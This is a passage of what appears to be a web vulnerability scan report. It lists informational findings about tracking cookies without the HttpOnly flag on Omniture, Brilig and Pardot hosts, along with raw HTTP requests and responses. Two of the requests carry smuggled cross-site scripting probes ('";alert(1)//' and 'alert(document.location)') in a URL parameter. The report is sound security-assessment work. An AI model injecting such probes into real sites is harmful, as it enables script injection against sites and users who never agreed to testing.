HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:34 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:54:34 GMT Last-Modified: Wed, 07 Sep 2011 15:54:34 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66423A-1A91-321F443B" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www118 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.125. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025?AQB=1&ndh=1&t=6/8/2011%2016%3A2%3A20%202%20300&pageName=OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage%3Fpage_id%3D501&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Search%20Test&c20=New&v20=New&c22=%28db_pages.getpage%3Fpage_id%3D501%29&c38=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&c39=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501 Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:02:24 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:02:24 GMT Last-Modified: Wed, 07 Sep 2011 16:02:24 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664410-12E6-6E8221CD" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www116 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.126. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A9%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2 Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:02:10 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:02:10 GMT Last-Modified: Wed, 07 Sep 2011 16:02:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664402-4052-4A49592A" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www362 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.127. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569?[AQB]&ndh=1&t=6/8/2011%2016%3A1%3A43%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2 Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:01:44 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:01:44 GMT Last-Modified: Wed, 07 Sep 2011 16:01:44 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E6643E8-0CDE-17D956AD" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www374 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.128. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A31%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%281%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(1)//43d7466ae8e Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:02:32 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:02:32 GMT Last-Modified: Wed, 07 Sep 2011 16:02:32 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664418-4A55-7F3D450F" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www598 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.129. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862?[AQB]&ndh=1&t=6/8/2011%2016%3A3%3A42%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%28document.location%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1 Host: oracleuniversity.112.2o7.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(document.location)//43d7466ae8e Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:03:43 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:03:43 GMT Last-Modified: Wed, 07 Sep 2011 16:03:43 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66445F-60B9-40E5F551" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www368 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.130. http://p.brilig.com/contact/bct
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://p.brilig.com
Path:
/contact/bct
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315321126439961%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1 Host: p.brilig.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:00:30 GMT Server: Apache/2.2.14 (Ubuntu) Pragma: no-cache Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Expires: Mon, 19 Dec 1983 15:00:30 GMTSet-Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315321126439961&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 Content-Length: 0 X-Brilig-D: D=3410 P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Connection: close Content-Type: text/plain
13.131. http://pi.pardot.com/analytics
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pi.pardot.com
Path:
/analytics
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com lpv1852=aHR0cDovL3d3dy56bm9kZS5jb20vem5vZGUtbXVsdGlmcm9udC9mZWF0dXJlLmFzcHg=; expires=Tue, 06-Sep-2011 16:03:53 GMT; path=/; secure The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /analytics?ver=3&visitor_id=191471185&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1 Host: pi.pardot.com Proxy-Connection: keep-alive Referer: http://www.znode.com/znode-multifront/feature.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: visitor_id3682=160859557; pardot=h5gc13lruog4br7fbhilcbhh31; visitor_id1852=191471185
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:33:53 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml" Vary: Accept-Encoding,User-Agent Content-Length: 680 Content-Type: text/javascript; charset=utf-8Set-Cookie: pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com Set-Cookie: lpv1852=aHR0cDovL3d3dy56bm9kZS5jb20vem5vZGUtbXVsdGlmcm9udC9mZWF0dXJlLmFzcHg=; expires=Tue, 06-Sep-2011 16:03:53 GMT; path=/; secure X-Pardot-LB: lb-d2 Connection: close function piResponse() { piSetCookie('visitor_id1852', '191471275', 3650); if (document.location.protocol != "https:") { var analytics_link = "http://" + "www2.znode.com/analytics?"; pi.tracker.visitor...[SNIP]...
